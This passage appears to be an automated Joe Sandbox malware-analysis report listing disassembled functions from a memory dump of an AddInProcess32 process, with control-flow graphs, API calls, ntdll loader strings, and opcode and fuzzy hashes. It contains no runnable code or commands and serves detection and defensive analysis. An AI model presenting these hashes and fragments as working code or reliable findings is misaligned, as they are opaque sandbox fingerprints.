            control_flow_graph 1426 dd660a-dd6629 call e25130 call dd6b95 1431 dd662f-dd664b call e17ed6 1426->1431 1432 e39aa6-e39aad 1426->1432 1440 dd664d-dd6656 call e017ce 1431->1440 1441 dd665f-dd6682 RtlDebugPrintTimes call dfd4c1 1431->1441 1434 e39ad7-e39ad9 1432->1434 1435 e39aaf-e39ad4 call e5ea12 1432->1435 1438 e39adb 1434->1438 1439 e39adc-e39ade 1434->1439 1435->1434 1438->1439 1444 e39ae6-e39aef 1439->1444 1440->1444 1449 dd665c 1440->1449 1441->1426 1458 dd6684-dd6687 1441->1458 1447 e39af1-e39b15 call e5ea12 1444->1447 1448 e39b18-e39b1a 1444->1448 1447->1448 1452 e39b1d-e39b2f call e620de call e22d50 1448->1452 1453 e39b1c 1448->1453 1449->1441 1460 dd668a-dd66fa RtlDebugPrintTimes call deffb0 1452->1460 1453->1452 1458->1460 1467 dd66fc 1460->1467 1468 dd66fe-dd6700 1460->1468 1467->1468 1469 dd6719-dd6746 call dee820 call dd67bf call e24c30 1468->1469 1470 dd6702-dd6717 call dd6754 1468->1470 1470->1469
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: DebugPrintTimes
            • String ID: h@3$h@3
            • API String ID: 3446177414-3617798911
            • Opcode ID: 41b3252948f4a1407a80adbe2e8cb4b1e6af00afbefc82b24a4939ad0d4c5b8a
            • Instruction ID: 7017362a62ceb3bbd3973f759bc1513e3db78f3dbc18a92b8aae981946e8901c
            • Opcode Fuzzy Hash: 41b3252948f4a1407a80adbe2e8cb4b1e6af00afbefc82b24a4939ad0d4c5b8a
            • Instruction Fuzzy Hash: 5E41E772B412189FCB14EB79EC5ABAD77A1FB40704F04155BE451BB292CB70EC48CBA0
            Function 00E6CEA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 134COMMON
            Download Yara Rule
            APIs
            • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E6CFBD
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: CallFilterFunc@8
            • String ID: @$@4Cw@4Cw$O
            • API String ID: 4062629308-1728305296
            • Opcode ID: 65b4b77e42a8c7bd4fd4042befd100e504f9db0e366c8e74c62c4fae7b5d665f
            • Instruction ID: 04d29c0b4bc4a7b2c72a84f4526f17410b52a715c60e4232773df4d93d966b50
            • Opcode Fuzzy Hash: 65b4b77e42a8c7bd4fd4042befd100e504f9db0e366c8e74c62c4fae7b5d665f
            • Instruction Fuzzy Hash: 3741CC71E40218DFCB219FA5ED41ABEBBF9EF44B44F11902AF914EB261D7748901CB61
            Function 00E188B1 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 122timeCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: DebugPrintTimes
            • String ID: f$f$f
            • API String ID: 3446177414-242920294
            • Opcode ID: 740e2a9785cef6ad8f087e3dc50be3aa5b75896916d6898a622a3f573111d314
            • Instruction ID: b1c7c021da3b873ed83a321d3c45d478df492bc8c185825d6a5259f6ea7163d1
            • Opcode Fuzzy Hash: 740e2a9785cef6ad8f087e3dc50be3aa5b75896916d6898a622a3f573111d314
            • Instruction Fuzzy Hash: 4141B9717043018BCB14DF28E98197EB7E5EFC8744F15992EE889A7241DB30D846CBA2
            Function 00E64755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
            Download Yara Rule
            APIs
            Strings
            • LdrpCheckRedirection, xrefs: 00E6488F
            • minkernel\ntdll\ldrredirect.c, xrefs: 00E64899
            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00E64888
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: DebugPrintTimes
            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
            • API String ID: 3446177414-3154609507
            • Opcode ID: 2d55d3629ff6edea7c22c4cebdca7aaf4ffe02d6378f87b0735ad203161824dd
            • Instruction ID: 0d4370f22b8775ca4686da6f5465103663f2a036faf44ef15581b95cb1ac1c5d
            • Opcode Fuzzy Hash: 2d55d3629ff6edea7c22c4cebdca7aaf4ffe02d6378f87b0735ad203161824dd
            • Instruction Fuzzy Hash: 5741D1B2A846548FCB25CF68E940A66B7E4EF8A794B05156AFC59F7391D330EC00CB91
            Function 00DDC070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: DebugPrintTimes
            • String ID: $
            • API String ID: 3446177414-3993045852
            • Opcode ID: e3484db13d7287121b3014b9ceb378ad38682a145955a5879cde44c1d5d460c7
            • Instruction ID: 2fdaf28ceb045eabf2d5f850833a731b4b69d1387b4f3483d11b88c15cc9088b
            • Opcode Fuzzy Hash: e3484db13d7287121b3014b9ceb378ad38682a145955a5879cde44c1d5d460c7
            • Instruction Fuzzy Hash: ED112A32A05219EFCF15AF65EC4969D7B72FB44360F108119F926762A0CB715A04DB80
            Function 00E68D20 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35timeCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: DebugPrintTimes
            • String ID: R$@R$@R
            • API String ID: 3446177414-1679218356
            • Opcode ID: a7a0ca499ca852e2326a08dfee91b5e44cb20723126a01a370cba5382d4f81df
            • Instruction ID: 86e28a127eb44873ef528de13f837cf7ad4961e03005f52bf3a511b7fc4a407f
            • Opcode Fuzzy Hash: a7a0ca499ca852e2326a08dfee91b5e44cb20723126a01a370cba5382d4f81df
            • Instruction Fuzzy Hash: B5F0E933540644AFC7217B19FD85B6ABB6DFBE4768F092527F845372B28A306C85C6B0
            Function 00E0EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4d42cf591bcb3567e0fbb56393d113489873ba364e9266f5cb4e89d7a1f65ff5
            • Instruction ID: 165e69b3209cd18650786c16a7c15084966616a1c74a670de26275c82653e97b
            • Opcode Fuzzy Hash: 4d42cf591bcb3567e0fbb56393d113489873ba364e9266f5cb4e89d7a1f65ff5
            • Instruction Fuzzy Hash: 37E11170E01608DFCB25CFA9D980AADBBF1FF48304F24552AE946B76A1D770A895CF10
            Function 00E5EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID: DebugPrintTimes
            • String ID:
            • API String ID: 3446177414-0
            • Opcode ID: 07d00125a96601064d16de0d16f21789a871a0173e94a56484f17a2bbf1b7880
            • Instruction ID: 52e02386a4cff7acc0c014751414057742c7bd88dea0737c2262ce743c621237
            • Opcode Fuzzy Hash: 07d00125a96601064d16de0d16f21789a871a0173e94a56484f17a2bbf1b7880
            • Instruction Fuzzy Hash: E2713471E02619EFDF04CFA4C984AEDBBB5BF48316F14542AE905FB251D734A909CBA0
            Function 00E14C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2659938414.0000000000DD6000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
            • Associated: 0000000E.00000002.2659938414.0000000000DB0000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E36000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000E72000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED3000.00000040.00001000.00020000.00000000.sdmpDownload File
            • Associated: 0000000E.00000002.2659938414.0000000000ED9000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_db0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: 0$Flst
            • API String ID: 0-758220159
            • Opcode ID: 21baf86d65399ff251a275d5c7e182758cdcb6362bfa7371655e60f43bf710d5
            • Instruction ID: 61bbb6b3a1ffd179231adad9049bd9062c405f8f0032517105e12b21ddee19bc
            • Opcode Fuzzy Hash: 21baf86d65399ff251a275d5c7e182758cdcb6362bfa7371655e60f43bf710d5
            • Instruction Fuzzy Hash: B3518CB1E012188FCF25CFA5E8846ADFBF4EF54758F15A42AD449AB290E7709D85CB80